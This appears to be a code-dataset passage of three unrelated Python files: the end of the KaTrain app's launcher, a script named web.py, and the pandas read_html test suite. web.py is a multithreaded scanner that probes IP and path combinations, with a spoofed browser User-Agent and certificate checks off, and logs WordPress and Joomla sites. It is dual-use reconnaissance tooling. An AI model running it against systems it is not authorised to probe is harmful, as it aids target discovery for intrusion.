webbrowser.open(websites[site_key])
def on_start(self):
self.language = self.gui.config("general/lang")
self.gui.start()
def on_request_close(self, *_args, source=None):
if source == "keyboard":
return True # do not close on esc
if getattr(self, "gui", None):
self.gui.play_mode.save_ui_state()
self.gui._config["ui_state"]["size"] = list(Window._size)
self.gui._config["ui_state"]["top"] = Window.top
self.gui._config["ui_state"]["left"] = Window.left
self.gui.save_config("ui_state")
if self.gui.engine:
self.gui.engine.shutdown(finish=None)
def signal_handler(self, _signal, _frame):
if self.gui.debug_level >= OUTPUT_DEBUG:
print("TRACEBACKS")
for threadId, stack in sys._current_frames().items():
print(f"\n# ThreadID: {threadId}")
for filename, lineno, name, line in traceback.extract_stack(stack):
print(f"\tFile: {filename}, line {lineno}, in {name}")
if line:
print(f"\t\t{line.strip()}")
self.stop()
def run_app():
class CrashHandler(ExceptionHandler):
def handle_exception(self, inst):
ex_type, ex, tb = sys.exc_info()
trace = "".join(traceback.format_tb(tb))
app = MDApp.get_running_app()
if app and app.gui:
app.gui.log(
f"Exception {inst.__class__.__name__}: {', '.join(repr(a) for a in inst.args)}\n{trace}",
OUTPUT_ERROR,
)
else:
print(f"Exception {inst.__class__}: {inst.args}\n{trace}")
return ExceptionManager.PASS
ExceptionManager.add_handler(CrashHandler())
app = KaTrainApp()
signal.signal(signal.SIGINT, app.signal_handler)
app.run()
if __name__ == "__main__":
run_app()
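# Hedged usage note: when installed as a package, this module is typically started via
# the `katrain` console entry point or `python -m katrain`, both of which end up calling
# run_app() above (an assumption based on this being the package's __main__ module).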
|
web.py
|
#!/usr/bin/python3
__author__ = "Flavius Ion"
__email__ = "igflavius@odyssee.ro"
__license__ = "MIT"
__version__ = "v1.3"
import argparse
import requests
import logging
import itertools
import threading
import queue
import sys
import os
import re
from bs4 import BeautifulSoup
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def check_file(file):
"""
Checks if file exists
"""
if not os.path.exists(file):
raise argparse.ArgumentTypeError("{0} does not exist".format(file))
return file
def arguments():
"""
    Parse and return the command-line arguments.
"""
parser = argparse.ArgumentParser(add_help=False, description='Web Scraper ' + __version__)
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument("-i", "--ip", dest="ip", type=check_file, required=True, help='ip list file')
required.add_argument("-p", "--path", dest="path", type=check_file, required=True, help='path list file',)
optional.add_argument("-l", "--log", dest="log", default="results.txt", help="save the results (default: results.txt)")
optional.add_argument("--port", dest="port", type=int, default=80, help="port number (default: 80)")
optional.add_argument("--threads", dest="num_threads", type=int, default=100, help="number of threads (default: 100)")
optional.add_argument("--ssl", dest="ssl", action="store_true", help="use ssl (default: none)")
optional.add_argument("-h", "--help", action="help", help="show this help message and exit")
arg = parser.parse_args()
return arg
def main():
"""
    Entry point: start the worker threads, build every (url, path) combination
    with itertools.product() and put the resulting targets in the queue.
    One None sentinel per thread is appended so the workers can break their loops.
"""
threads = []
num_threads = arg.num_threads
port = str(arg.port)
# Multithread
for thread in range(num_threads):
        th = threading.Thread(target=scanner, daemon=True)
threads.append(th)
th.start()
# add url, port and path in queue()
with open(arg.ip) as file1, open(arg.path) as file2:
for url, path in itertools.product(file1, file2):
url = url.rstrip().strip()
path = path.rstrip().strip()
threads_queue.put(url + ":" + port + path)
# add None to the end queue() to break the loop
for thread in threads:
threads_queue.put(None)
for thread in threads:
thread.join()
def scanner():
"""
    Worker loop: take URLs from the queue, request each one and log those whose
    response contains any of the keywords.
    A None item from the queue breaks the loop.
"""
logging.basicConfig(format='%(message)s', level=logging.INFO, handlers=[logging.FileHandler(arg.log), logging.StreamHandler(sys.stdout)])
headers = requests.utils.default_headers()
headers.update({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'})
keywords = ["Powered by WordPress", "Powered by Joomla"]
while True:
url = threads_queue.get()
ssl = arg.ssl
if url is None:
break
if ssl is False:
try:
req = requests.get("http://" + url, headers=headers, timeout=3, allow_redirects=True, verify=False)
soup = BeautifulSoup(req.text, 'html.parser')
if soup.find_all(string=re.compile('|'.join(keywords))):
logging.info("http://%s", url)
except requests.RequestException:
pass
else:
try:
req = requests.get("https://" + url, headers=headers, timeout=3, allow_redirects=True, verify=False)
soup = BeautifulSoup(req.text, 'html.parser')
if soup.find_all(string=re.compile('|'.join(keywords))):
logging.info("https://%s", url)
except requests.RequestException:
pass
if __name__ == '__main__':
try:
threads_queue = queue.Queue(maxsize=0)
arg = arguments()
main()
except KeyboardInterrupt:
        print("[+] Ctrl + C ... Exiting")
        sys.exit(0)
|
test_html.py
|
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture
def spam_data(self, datapath):
return datapath("io", "data", "html", "spam.html")
@pytest.fixture
def banklist_data(self, datapath):
return datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url(self):
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
),
check_before_test=True,
)
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self, banklist_data):
df1 = self.read_html(banklist_data, match=".*Florida.*", attrs={"id": "table"})
df2 = self.read_html(banklist_data, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
def test_spam(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*")
df2 = self.read_html(spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self, spam_data):
dfs = self.read_html(spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self, banklist_data):
dfs = self.read_html(banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self, spam_data):
df = self.read_html(spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self, spam_data):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self, spam_data):
df1 = self.read_html(spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self, spam_data):
# 10892 infer_types removed
df1 = self.read_html(spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self, spam_data):
with open(spam_data, encoding="UTF-8") as f:
data1 = StringIO(f.read())
with open(spam_data, encoding="UTF-8") as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self, spam_data):
with open(spam_data, encoding="UTF-8") as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self, spam_data):
with open(spam_data, encoding="UTF-8") as f:
df1 = self.read_html(f, match=".*Water.*")
with open(spam_data, encoding="UTF-8") as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@pytest.mark.slow
@pytest.mark.network
@tm.network
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self, banklist_data):
url = banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self, banklist_data):
url = banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, path, *args, **kwargs):
return self.read_html(
path, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self, banklist_data):
df = self._bank_data(banklist_data, index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self, banklist_data):
df = self._bank_data(banklist_data, header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self, banklist_data):
df = self._bank_data(
banklist_data, header=[0, 1], index_col=[0, 1], skiprows=1
)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self, banklist_data):
url = banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self, spam_data):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(spam_data, match="Water", skiprows=-1)
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
        Make sure that read_html reads tfoot, containing td or th elements,
        and ignores an empty tfoot.
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, banklist_data, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(banklist_data, match="Metcalf", attrs={"id": "table"})[0]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self, banklist_data):
gc = "Gold Canyon"
with open(banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(banklist_data, match="Gold Canyon", attrs={"id": "table"})[
0
]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
expected = DataFrame(
[["a", "b"]],
columns=MultiIndex.from_tuples(
[("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
),
)
tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("arg", [True, False])
def test_bool_header_arg(self, spam_data, arg):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
with pytest.raises(TypeError, match=msg):
self.read_html(spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
